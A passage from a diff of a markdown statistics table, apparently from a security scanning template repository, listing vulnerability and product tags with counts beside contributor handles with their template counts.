9 | | | | | | | -| cve2010 | 32 | iamthefrogy | 8 | | | | | | | +| ssrf | 32 | aashiq | 8 | | | | | | | | cve2016 | 32 | that_juan_ | 8 | | | | | | | -| workflow | 30 | aashiq | 8 | | | | | | | -| logs | 30 | emadshanab | 7 | | | | | | | -| oracle | 30 | dr_set | 7 | | | | | | | -| jira | 27 | techryptic (@tech) | 7 | | | | | | | -| misc | 27 | kophjager007 | 7 | | | | | | | -| atlassian | 27 | harshbothra_ | 7 | | | | | | | -| redirect | 25 | 0x240x23elu | 7 | | | | | | | -| listing | 25 | randomstr1ng | 7 | | | | | | | -| generic | 22 | oppsec | 7 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| cisco | 19 | caspergn | 6 | | | | | | | -| cve2015 | 18 | __fazal | 6 | | | | | | | -| disclosure | 18 | joanbono | 5 | | | | | | | -| sap | 18 | iamnoooob | 5 | | | | | | | -| router | 17 | yanyun | 5 | | | | | | | -| auth-bypass | 17 | panch0r3d | 5 | | | | | | | -| springboot | 16 | rootxharsh | 5 | | | | | | | -| cve2014 | 15 | pentest_swissky | 5 | | | | | | | -| debug | 14 | meme-lord | 5 | | | | | | | -| cve2012 | 14 | ganofins | 5 | | | | | | | -| struts | 13 | e_schultze_ | 4 | | | | | | | +| workflow | 30 | iamthefrogy | 8 | | | | | | | +| oracle | 30 | 0x240x23elu | 7 | | | | | | | +| logs | 30 | kophjager007 | 7 | | | | | | | +| jira | 28 | techryptic (@tech) | 7 | | | | | | | +| misc | 27 | oppsec | 7 | | | | | | | +| atlassian | 27 | randomstr1ng | 7 | | | | | | | +| redirect | 26 | dogasantos | 7 | | | | | | | +| listing | 25 | dr_set | 7 | | | | | | | +| generic | 22 | harshbothra_ | 7 | | | | | | | +| aem | 19 | emadshanab | 7 | | | | | | | +| cisco | 19 | __fazal | 6 | | | | | | | +| router | 19 | puzzlepeaches | 6 | | | | | | | +| cve2015 | 19 | caspergn | 6 | | | | | | | +| sap | 18 | meme-lord | 6 | | | | | | | +| disclosure | 18 | elsfa7110 | 5 | | | | | | | +| auth-bypass | 17 | joanbono | 5 | | | | | | | +| springboot | 16 | yanyun | 5 | | | | | | | +| cve2014 | 15 | panch0r3d | 5 | | | | | | | +| cve2012 | 14 | iamnoooob | 5 | | | | | | | +| debug | 14 | rootxharsh | 5 | | | | | | | +| android | 13 | pentest_swissky | 5 | | | | | | | +| cve2011 | 13 | logicalhunter | 5 | | | | | | | +| misconfig | 13 | ganofins | 5 | | | | | | | +| struts | 13 | nodauf | 4 | | | | | | | | fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| misconfig | 13 | xelkomy | 4 | | | | | | | -| android | 13 | dogasantos | 4 | | | | | | | -| cve2011 | 13 | nodauf | 4 | | | | | | | -| dns | 12 | elsfa7110 | 4 | | | | | | | -| php | 12 | vsh00t | 3 | | | | | | | +| adobe | 12 | e_schultze_ | 4 | | | | | | | +| weblogic | 12 | xelkomy | 4 | | | | | | | | jenkins | 12 | tess | 3 | | | | | | | -| weblogic | 12 | fyoorer | 3 | | | | | | | -| dlink | 12 | shine | 3 | | | | | | | -| adobe | 12 | shifacyclewala | 3 | | | | | | | -| devops | 11 | binaryfigments | 3 | | | | | | | -| zoho | 11 | logicalhunter | 3 | | | | | | | -| cve2013 | 11 | incogbyte | 3 | | | | | | | -| ftp | 9 | emenalf | 3 | | | | | | | -| xxe | 9 | yash anand @yashanand155 | 3 | | | | | | | -| magento | 9 | dudez | 3 | | | | | | | -| gitlab | 8 | z3bd | 3 | | | | | | | -| ruijie | 8 | mavericknerd | 3 | | | | | | | -| aws | 8 | impramodsargar | 3 | | | | | | | -| login | 8 | 0w4ys | 3 | | | | | | | -| scada | 8 | thomas_from_offensity | 3 | | | | | | | -| airflow | 8 | f1tz | 3 | | | | | | | -| cnvd | 8 | _generic_human_ | 3 | | | | | | | -| rails | 8 | jarijaas | 3 | | | | | | | -| backup | 7 | vavkamil | 2 | | | | | | | -| vmware | 7 | davidmckennirey | 2 | | | | | | | -| nginx | 7 | random-robbie | 2 | | | | | | | -| cms | 7 | foulenzer | 2 | | | | | | | -| cve2009 | 7 | ree4pwn | 2 | | | | | | | -| cve2008 | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| google | 6 | whoever | 2 | | | | | | | -| files | 6 | hetroublemakr | 2 | | | | | | | -| jetty | 6 | unstabl3 | 2 | | | | | | | -| solr | 6 | fabaff | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| api | 6 | hahwul | 2 | | | | | | | -| coldfusion | 6 | x1m_martijn | 2 | | | | | | | -| netgear | 6 | amsda | 2 | | | | | | | -| django | 6 | lotusdll | 2 | | | | | | | -| citrix | 6 | koti2 | 2 | | | | | | | -| laravel | 6 | alifathi-h1 | 2 | | | | | | | -| dell | 6 | mohammedsaneem | 2 | | | | | | | -| microsoft | 5 | manas_harsh | 2 | | | | | | | -| printer | 5 | pxmme1337 | 2 | | | | | | | -| fileupload | 5 | joeldeleep | 2 | | | | | | | -| circarlife | 5 | parth | 2 | | | | | | | -| java | 5 | randomrobbie | 2 | | | | | | | -| docker | 5 | dheerajmadhukar | 2 | | | | | | | -| iis | 5 | gal nagli | 2 | | | | | | | -| confluence | 5 | swissky | 2 | | | | | | | -| ssti | 5 | 0xprial | 2 | | | | | | | -| headless | 5 | sushantkamble | 2 | | | | | | | -| drupal | 5 | nkxxkn | 2 | | | | | | | -| wp-theme | 5 | w4cky_ | 2 | | | | | | | -| windows | 5 | 0xelkomy | 2 | | | | | | | -| lucee | 5 | afaq | 2 | | | | | | | -| ibm | 5 | kiblyn11 | 2 | | | | | | | -| phpmyadmin | 5 | bsysop | 2 | | | | | | | -| dedecms | 5 | zomsop82 | 2 | | | | | | | -| exchange | 4 | bp0lr | 2 | | | | | | | -| artifactory | 4 | 0xcrypto | 2 | | | | | | | -| zimbra | 4 | 0xsapra | 2 | | | | | | | -| crlf | 4 | bing0o | 2 | | | | | | | -| webserver | 4 | ehsahil | 2 | | | | | | | -| thinkcmf | 4 | udit_thakkur | 2 | | | | | | | -| moodle | 4 | arcc | 2 | | | | | | | -| deserialization | 4 | 0xrudra | 2 | | | | | | | -| hongdian | 4 | gevakun | 2 | | | | | | | -| solarwinds | 4 | lu4nx | 2 | | | | | | | -| glpi | 4 | cookiehanhoan | 1 | | | | | | | -| grafana | 4 | jteles | 1 | | | | | | | -| firmware | 4 | th3.d1p4k | 1 | | | | | | | -| thinkphp | 4 | exploitation | 1 | | | | | | | -| hp | 4 | fmunozs | 1 | | | | | | | -| magmi | 4 | yashanand155 | 1 | | | | | | | -| vpn | 4 | _harleo | 1 | | | | | | | -| tomcat | 4 | r3naissance | 1 | | | | | | | -| traversal | 4 | idealphase | 1 | | | | | | | -| samsung | 4 | luskabol | 1 | | | | | | | -| asp | 4 | sy3omda | 1 | | | | | | | -| buffalo | 4 | adrianmf | 1 | | | | | | | -| jolokia | 4 | sshell | 1 | | | | | | | -| nodejs | 4 | elmahdi | 1 | | | | | | | -| elastic | 4 | becivells | 1 | | | | | | | -| targa | 3 | borna nematzadeh | 1 | | | | | | | -| resin | 3 | notsoevilweasel | 1 | | | | | | | -| symfony | 3 | bad5ect0r | 1 | | | | | | | -| opensis | 3 | pdp | 1 | | | | | | | -| kafka | 3 | ipanda | 1 | | | | | | | -| microstrategy | 3 | willd96 | 1 | | | | | | | -| terramaster | 3 | wabafet | 1 | | | | | | | -| fpd | 3 | ohlinge | 1 | | | | | | | -| nexus | 3 | qlkwej | 1 | | | | | | | -| httpd | 3 | bolli95 | 1 | | | | | | | -| ebs | 3 | g4l1t0 | 1 | | | | | | | -| tikiwiki | 3 | sickwell | 1 | | | | | | | -| zabbix | 3 | schniggie | 1 | | | | | | | -| bitrix | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| kubernetes | 3 | me9187 | 1 | | | | | | | -| vbulletin | 3 | alph4byt3 | 1 | | | | | | | -| backups | 3 | mubassirpatel | 1 | | | | | | | -| intrusive | 3 | manuelbua | 1 | | | | | | | -| bypass | 3 | tirtha_mandal | 1 | | | | | | | -| ofbiz | 3 | convisoappsec | 1 | | | | | | | -| openssh | 3 | ooooooo_q | 1 | | | | | | | -| kevinlab | 3 | juicypotato1 | 1 | | | | | | | -| git | 3 | johnjhacking | 1 | | | | | | | -| ssh | 3 | ahmed sherif | 1 | | | | | | | -| nacos | 3 | johnk3r | 1 | | | | | | | -| slack | 3 | 52971 | 1 | | | | | | | -| nosqli | 3 | petruknisme | 1 | | | | | | | -| mongodb | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| dns | 12 | dudez | 3 | | | | | | | +| php | 12 | emenalf | 3 | | | | | | | +| dlink | 12 | thomas_from_offensity | 3 | | | | | | | +| zoho | 11 | impramodsargar | 3 | | | | | | | +| cve2013 | 11 | vsh00t | 3 | | | | | | | +| devops | 11 | shine | 3 | | | | | | | +| ftp | 9 | lu4nx | 3 | | | | | | | +| magento | 9 | shifacyclewala | 3 | | | | | | | +| xxe | 9 | jarijaas | 3 | | | | | | | +| aws | 9 | yash anand @yashanand155 | 3 | | | | | | | +| login | 8 | f1tz | 3 | | | | | | | +| airflow | 8 | _generic_human_ | 3 | | | | | | | +| gitlab | 8 | fyoorer | 3 | | | | | | | +| rails | 8 | incogbyte | 3 | | | | | | | +| scada | 8 | mavericknerd | 3 | | | | | | | +| ruijie | 8 | binaryfigments | 3 | | | | | | | +| cnvd | 8 | z3bd | 3 | | | | | | | +| cms | 7 | 0w4ys | 3 | | | | | | | +| nginx | 7 | gal nagli | 2 | | | | | | | +| backup | 7 | random-robbie | 2 | | | | | | | +| vmware | 7 | dheerajmadhukar | 2 | | | | | | | +| cve2009 | 7 | pxmme1337 | 2 | | | | | | | +| citrix | 6 | hahwul | 2 | | | | | | | +| coldfusion | 6 | arcc | 2 | | | | | | | +| docker | 6 | fabaff | 2 | | | | | | | +| laravel | 6 | whoever | 2 | | | | | | | +| jetty | 6 | alifathi-h1 | 2 | | | | | | | +| api | 6 | ehsahil | 2 | | | | | | | +| google | 6 | parth | 2 | | | | | | | +| solr | 6 | ree4pwn | 2 | | | | | | | +| dell | 6 | moritz nentwig | 2 | | | | | | | +| rconfig | 6 | hetroublemakr | 2 | | | | | | | +| django | 6 | 0xrudra | 2 | | | | | | | +| files | 6 | 0xelkomy | 2 | | | | | | | +| cve2008 | 6 | vavkamil | 2 | | | | | | | +| netgear | 6 | w4cky_ | 2 | | | | | | | +| drupal | 5 | zomsop82 | 2 | | | | | | | +| printer | 5 | 0xprial | 2 | | | | | | | +| headless | 5 | bing0o | 2 | | | | | | | +| phpmyadmin | 5 | cocxanh | 2 | | | | | | | +| confluence | 5 | afaq | 2 | | | | | | | +| wp-theme | 5 | randomrobbie | 2 | | | | | | | +| windows | 5 | manas_harsh | 2 | | | | | | | +| circarlife | 5 | 0xcrypto | 2 | | | | | | | +| fileupload | 5 | nkxxkn | 2 | | | | | | | +| ssti | 5 | 0xsapra | 2 | | | | | | | +| microsoft | 5 | x1m_martijn | 2 | | | | | | | +| ibm | 5 | bp0lr | 2 | | | | | | | +| lucee | 5 | lotusdll | 2 | | | | | | | +| iis | 5 | gevakun | 2 | | | | | | | +| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| dedecms | 5 | joeldeleep | 2 | | | | | | | +| jolokia | 4 | koti2 | 2 | | | | | | | +| tomcat | 4 | swissky | 2 | | | | | | | +| hp | 4 | sushantkamble | 2 | | | | | | | +| glpi | 4 | davidmckennirey | 2 | | | | | | | +| deserialization | 4 | foulenzer | 2 | | | | | | | +| crlf | 4 | mohammedsaneem | 2 | | | | | | | +| thinkphp | 4 | amsda | 2 | | | | | | | +| zimbra | 4 | bsysop | 2 | | | | | | | +| samsung | 4 | unstabl3 | 2 | | | | | | | +| wso2 | 4 | kiblyn11 | 2 | | | | | | | +| webserver | 4 | udit_thakkur | 2 | | | | | | | +| hongdian | 4 | yashanand155 | 1 | | | | | | | +| moodle | 4 | andirrahmani1 | 1 | | | | | | | +| grafana | 4 | j33n1k4 | 1 | | | | | | | +| elastic | 4 | johnjhacking | 1 | | | | | | | +| firmware | 4 | omarkurt | 1 | | | | | | | +| thinkcmf | 4 | blckraven | 1 | | | | | | | +| symfony | 4 | bad5ect0r | 1 | | | | | | | +| nodejs | 4 | streetofhackerr007 | 1 | | | | | | | +| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| zhiyuan | 3 | zhenwarx | 1 | | | | | | | -| springcloud | 3 | mah3sec_ | 1 | | | | | | | -| lfr | 3 | rojanrijal | 1 | | | | | | | -| r-seenet | 3 | b0yd | 1 | | | | | | | -| fanruan | 3 | revblock | 1 | | | | | | | -| caucho | 3 | pratik khalane | 1 | | | | | | | -| amazon | 3 | _c0wb0y_ | 1 | | | | | | | -| log | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| wso2 | 3 | s1r1u5_ | 1 | | | | | | | -| oa | 3 | j33n1k4 | 1 | | | | | | | -| itop | 3 | knassar702 | 1 | | | | | | | -| seeyon | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| shellshock | 2 | vzamanillo | 1 | | | | | | | -| geowebserver | 2 | its0x08 | 1 | | | | | | | -| prestashop | 2 | intx0x80 | 1 | | | | | | | -| webcam | 2 | mesaglio | 1 | | | | | | | -| backdoor | 2 | kba@sogeti_esec | 1 | | | | | | | -| paloalto | 2 | 0ut0fb4nd | 1 | | | | | | | -| waf | 2 | fopina | 1 | | | | | | | -| netis | 2 | 0xtavian | 1 | | | | | | | -| hpe | 2 | alex | 1 | | | | | | | -| avantfax | 2 | _darrenmartyn | 1 | | | | | | | -| kibana | 2 | raesene | 1 | | | | | | | -| idrac | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| saltstack | 2 | pudsec | 1 | | | | | | | -| cve2007 | 2 | infosecsanyam | 1 | | | | | | | -| icewarp | 2 | absshax | 1 | | | | | | | -| igs | 2 | rodnt | 1 | | | | | | | -| service | 2 | makyotox | 1 | | | | | | | -| rstudio | 2 | nytr0gen | 1 | | | | | | | -| splunk | 2 | geraldino2 | 1 | | | | | | | -| natshell | 2 | rtcms | 1 | | | | | | | -| proxy | 2 | jeya seelan | 1 | | | | | | | -| huawei | 2 | elder tao | 1 | | | | | | | -| activemq | 2 | remonsec | 1 | | | | | | | -| glassfish | 2 | kabirsuda | 1 | | | | | | | -| emerge | 2 | thezakman | 1 | | | | | | | -| openam | 2 | retr0 | 1 | | | | | | | -| jsf | 2 | kurohost | 1 | | | | | | | -| rockmongo | 2 | whynotke | 1 | | | | | | | -| hasura | 2 | udyz | 1 | | | | | | | -| wordfence | 2 | undefl0w | 1 | | | | | | | -| ucmdb | 2 | ajaysenr | 1 | | | | | | | -| ecology | 2 | tim_koopmans | 1 | | | | | | | -| guacamole | 2 | andirrahmani1 | 1 | | | | | | | -| azure | 2 | affix | 1 | | | | | | | -| status | 2 | kareemse1im | 1 | | | | | | | -| telerik | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| oauth | 2 | shifacyclewla | 1 | | | | | | | -| prometheus | 2 | yavolo | 1 | | | | | | | -| nagios | 2 | mass0ma | 1 | | | | | | | -| mail | 2 | defr0ggy | 1 | | | | | | | -| github | 2 | @dwisiswant0 | 1 | | | | | | | -| jboss | 2 | thevillagehacker | 1 | | | | | | | -| frp | 2 | b4uh0lz | 1 | | | | | | | -| hoteldruid | 2 | aresx | 1 | | | | | | | -| sonicwall | 2 | hakluke | 1 | | | | | | | -| jellyfin | 2 | daviey | 1 | | | | | | | -| sonarqube | 2 | regala_ | 1 | | | | | | | -| injection | 2 | bernardo rodrigues | 1 | | | | | | | +| traversal | 4 | retr0 | 1 | | | | | | | +| exchange | 4 | regala_ | 1 | | | | | | | +| solarwinds | 4 | intx0x80 | 1 | | | | | | | +| vpn | 4 | luci | 1 | | | | | | | +| magmi | 4 | juicypotato1 | 1 | | | | | | | +| asp | 4 | mah3sec_ | 1 | | | | | | | +| buffalo | 4 | convisoappsec | 1 | | | | | | | +| oa | 3 | deena | 1 | | | | | | | +| terramaster | 3 | aresx | 1 | | | | | | | +| bitrix | 3 | kurohost | 1 | | | | | | | +| nexus | 3 | undefl0w | 1 | | | | | | | +| fanruan | 3 | mhdsamx | 1 | | | | | | | +| zabbix | 3 | schniggie | 1 | | | | | | | +| slack | 3 | shelld3v | 1 | | | | | | | +| itop | 3 | bjhulst | 1 | | | | | | | +| kafka | 3 | raesene | 1 | | | | | | | +| vbulletin | 3 | abison_binoy | 1 | | | | | | | +| bypass | 3 | apt-mirror | 1 | | | | | | | +| mongodb | 3 | zhenwarx | 1 | | | | | | | +| lfr | 3 | cookiehanhoan | 1 | | | | | | | +| targa | 3 | hakluke | 1 | | | | | | | +| caucho | 3 | petruknisme | 1 | | | | | | | +| ssh | 3 | berkdusunur | 1 | | | | | | | +| nosqli | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| rockethchat | 2 | akash.c | 1 | | | | | | | -| smtp | 2 | @github.com/defr0ggy | 1 | | | | | | | -| horde | 2 | co0nan | 1 | | | | | | | -| trixbox | 2 | aceseven (digisec360) | 1 | | | | | | | -| sharepoint | 2 | flag007 | 1 | | | | | | | -| voipmonitor | 2 | evolutionsec | 1 | | | | | | | -| odoo | 2 | smaranchand | 1 | | | | | | | -| chiyu | 2 | furkansenan | 1 | | | | | | | -| mcafee | 2 | yashgoti | 1 | | | | | | | -| leak | 2 | apt-mirror | 1 | | | | | | | -| jeedom | 2 | divya_mudgal | 1 | | | | | | | -| plesk | 2 | sec_hawk | 1 | | | | | | | -| hjtcloud | 2 | philippdelteil | 1 | | | | | | | -| hashicorp | 2 | hanlaomo | 1 | | | | | | | -| showdoc | 2 | chron0x | 1 | | | | | | | -| openfire | 2 | bjhulst | 1 | | | | | | | -| yapi | 2 | 0xrod | 1 | | | | | | | -| akamai | 2 | noamrathaus | 1 | | | | | | | -| cache | 2 | d0rkerdevil | 1 | | | | | | | -| strapi | 2 | c3l3si4n | 1 | | | | | | | -| linkerd | 2 | deena | 1 | | | | | | | -| keycloak | 2 | soyelmago | 1 | | | | | | | -| cve2005 | 2 | patralos | 1 | | | | | | | -| kentico | 2 | dawid czarnecki | 1 | | | | | | | -| dolibarr | 2 | sicksec | 1 | | | | | | | -| xxljob | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| ebs | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| backups | 3 | yavolo | 1 | | | | | | | +| resin | 3 | andysvints | 1 | | | | | | | +| zhiyuan | 3 | kba@sogeti_esec | 1 | | | | | | | +| ofbiz | 3 | bolli95 | 1 | | | | | | | +| openssh | 3 | sy3omda | 1 | | | | | | | +| httpd | 3 | manuelbua | 1 | | | | | | | +| microstrategy | 3 | noamrathaus | 1 | | | | | | | +| kubernetes | 3 | rojanrijal | 1 | | | | | | | +| kevinlab | 3 | rodnt | 1 | | | | | | | +| nacos | 3 | ahmed sherif | 1 | | | | | | | +| tikiwiki | 3 | remonsec | 1 | | | | | | | +| springcloud | 3 | 0xtavian | 1 | | | | | | | +| fpd | 3 | tirtha_mandal | 1 | | | | | | | +| intrusive | 3 | iampritam | 1 | | | | | | | +| log | 3 | notsoevilweasel | 1 | | | | | | | +| opensis | 3 | s1r1u5_ | 1 | | | | | | | +| amazon | 3 | akash.c | 1 | | | | | | | +| r-seenet | 3 | d0rkerdevil | 1 | | | | | | | +| git | 3 | fopina | 1 | | | | | | | +| smb | 2 | rtcms | 1 | | | | | | | +| grav | 2 | c3l3si4n | 1 | | | | | | | +| paloalto | 2 | kre80r | 1 | | | | | | | +| icewarp | 2 | ldionmarcil | 1 | | | | | | | +| hashicorp | 2 | @github.com/defr0ggy | 1 | | | | | | | +| geowebserver | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| phpcollab | 2 | its0x08 | 1 | | | | | | | +| service | 2 | affix | 1 | | | | | | | +| leak | 2 | toufik airane | 1 | | | | | | | +| prestashop | 2 | exploitation | 1 | | | | | | | +| smtp | 2 | alex | 1 | | | | | | | +| akamai | 2 | b0yd | 1 | | | | | | | +| keycloak | 2 | fmunozs | 1 | | | | | | | +| saltstack | 2 | jeya seelan | 1 | | | | | | | +| status | 2 | b4uh0lz | 1 | | | | | | | +| odoo | 2 | r3naissance | 1 | | | | | | | +| cve2007 | 2 | g4l1t0 | 1 | | | | | | | +| openfire | 2 | infosecsanyam | 1 | | | | | | | +| jboss | 2 | 0ut0fb4nd | 1 | | | | | | | +| nagios | 2 | furkansenan | 1 | | | | | | | +| fortios | 2 | huowuzhao | 1 | | | | | | | +| spark | 2 | thezakman | 1 | | | | | | | +| splunk | 2 | alperenkesk | 1 | | | | | | | +| nextjs | 2 | ipanda | 1 | | | | | | | +| akkadian | 2 | knassar702 | 1 | | | | | | | +| guacamole | 2 | shifacyclewla | 1 | | | | | | | +| sonarqube | 2 | pratik khalane | 1 | | | | | | | +| prometheus | 2 | makyotox | 1 | | | | | | | +| strapi | 2 | alph4byt3 | 1 | | | | | | | +| dos | 2 | yashgoti | 1 | | | | | | | +| chamilo | 2 | elmahdi | 1 | | | | | | | +| cache | 2 | gboddin | 1 | | | | | | | +| webcam | 2 | 0xteles | 1 | | | | | | | +| linkerd | 2 | soyelmago | 1 | | | | | | | +| rockethchat | 2 | willd96 | 1 | | | | | | | +| emerge | 2 | ratnadip gajbhiye | 1 | | | | | | | +| axis2 | 2 | mass0ma | 1 | | | | | | | +| backdoor | 2 | mubassirpatel | 1 | | | | | | | +| activemq | 2 | vzamanillo | 1 | | | | | | | +| flir | 2 | micha3lb3n | 1 | | | | | | | +| waf | 2 | smaranchand | 1 | | | | | | | +| openam | 2 | daviey | 1 | | | | | | | +| azure | 2 | divya_mudgal | 1 | | | | | | | +| glassfish | 2 | sickwell | 1 | | | | | | | +| vrealize | 2 | zandros0 | 1 | | | | | | | +| rstudio | 2 | ooooooo_q | 1 | | | | | | | +| ecology | 2 | chron0x | 1 | | | | | | | +| github | 2 | 0h1in9e | 1 | | | | | | | +| globalprotect | 2 | defr0ggy | 1 | | | | | | | +| yapi | 2 | tim_koopmans | 1 | | | | | | | +| bigip | 2 | _c0wb0y_ | 1 | | | | | | | +| pega | 2 | wabafet | 1 | | | | | | | +| mail | 2 | luskabol | 1 | | | | | | | +| rockmongo | 2 | elder tao | 1 | | | | | | | +| seeyon | 2 | 52971 | 1 | | | | | | | +| firebase | 2 | mesaglio | 1 | | | | | | | +| maian | 2 | @dwisiswant0 | 1 | | | | | | | +| sonicwall | 2 | qlkwej | 1 | | | | | | | +| showdoc | 2 | sshell | 1 | | | | | | | +| horde | 2 | revblock | 1 | | | | | | | +| telerik | 2 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| akkadian | 2 | gboddin | 1 | | | | | | | -| mida | 2 | bernardofsr | 1 | | | | | | | -| spark | 2 | micha3lb3n | 1 | | | | | | | -| pega | 2 | berkdusunur | 1 | | | | | | | -| dos | 2 | iampritam | 1 | | | | | | | -| firebase | 2 | toufik airane | 1 | | | | | | | -| chamilo | 2 | omarkurt | 1 | | | | | | | -| fortios | 2 | ringo | 1 | | | | | | | -| globalprotect | 2 | luci | 1 | | | | | | | -| flir | 2 | streetofhackerr007 | 1 | | | | | | | -| smb | 2 | zandros0 | 1 | | | | | | | -| bigip | 2 | sullo | 1 | | | | | | | -| phpcollab | 2 | taielab | 1 | | | | | | | -| maian | 2 | 0xteles | 1 | | | | | | | -| nextjs | 2 | abison_binoy | 1 | | | | | | | -| grav | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| couchdb | 2 | 0h1in9e | 1 | | | | | | | -| vrealize | 2 | un-fmunozs | 1 | | | | | | | -| monitorr | 1 | huowuzhao | 1 | | | | | | | -| vscode | 1 | alperenkesk | 1 | | | | | | | -| exacqvision | 1 | naglinagli | 1 | | | | | | | -| cse | 1 | akshansh | 1 | | | | | | | -| traefik | 1 | shelld3v | 1 | | | | | | | -| npm | 1 | shreyapohekar | 1 | | | | | | | -| geutebruck | 1 | ldionmarcil | 1 | | | | | | | -| st | 1 | mhdsamx | 1 | | | | | | | -| viewpoint | 1 | ratnadip gajbhiye | 1 | | | | | | | -| livezilla | 1 | blckraven | 1 | | | | | | | -| zookeeper | 1 | ilovebinbash | 1 | | | | | | | -| blackboard | 1 | andysvints | 1 | | | | | | | -| proftpd | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | +| hoteldruid | 2 | adrianmf | 1 | | | | | | | +| mida | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| jeedom | 2 | patralos | 1 | | | | | | | +| idrac | 2 | kabirsuda | 1 | | | | | | | +| igs | 2 | idealphase | 1 | | | | | | | +| frp | 2 | th3.d1p4k | 1 | | | | | | | +| middleware | 2 | me9187 | 1 | | | | | | | +| ec2 | 2 | sullo | 1 | | | | | | | +| chiyu | 2 | 0xrod | 1 | | | | | | | +| huawei | 2 | co0nan | 1 | | | | | | | +| jsf | 2 | thevillagehacker | 1 | | | | | | | +| wordfence | 2 | shreyapohekar | 1 | | | | | | | +| jellyfin | 2 | dawid czarnecki | 1 | | | | | | | +| avantfax | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| dolibarr | 2 | _darrenmartyn | 1 | | | | | | | +| cve2005 | 2 | evolutionsec | 1 | | | | | | | +| hasura | 2 | absshax | 1 | | | | | | | +| netis | 2 | naglinagli | 1 | | | | | | | +| kentico | 2 | _harleo | 1 | | | | | | | +| oauth | 2 | aceseven (digisec360) | 1 | | | | | | | +| kibana | 2 | bernardofsr | 1 | | | | | | | +| hpe | 2 | ajaysenr | 1 | | | | | | | +| voipmonitor | 2 | akshansh | 1 | | | | | | | +| injection | 2 | nytr0gen | 1 | | | | | | | +| proxy | 2 | un-fmunozs | 1 | | | | | | | +| xxljob | 2 | borna nematzadeh | 1 | | | | | | | +| ucmdb | 2 | sicksec | 1 | | | | | | | +| trixbox | 2 | pudsec | 1 | | | | | | | +| shellshock | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| hjtcloud | 2 | geraldino2 | 1 | | | | | | | +| couchdb | 2 | b0rn2r00t | 1 | | | | | | | +| sharepoint | 2 | ohlinge | 1 | | | | | | | +| mcafee | 2 | johnk3r | 1 | | | | | | | +| natshell | 2 | pdp | 1 | | | | | | | +| axis | 2 | hanlaomo | 1 | | | | | | | +| plesk | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| resourcespace | 1 | becivells | 1 | | | | | | | +| chevereto | 1 | whynotke | 1 | | | | | | | +| addpac | 1 | jteles | 1 | | | | | | | +| gloo | 1 | taielab | 1 | | | | | | | +| acme | 1 | kareemse1im | 1 | | | | | | | +| db | 1 | udyz | 1 | | | | | | | +| announcekit | 1 | sec_hawk | 1 | | | | | | | +| node-red-dashboard | 1 | ilovebinbash | 1 | | | | | | | +| tapestry | 1 | philippdelteil | 1 | | | | | | | +| clockwatch | 1 | ringo | 1 | | | | | | | +| owasp | 1 | flag007 | 1 | | | | | | | | vnc | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | 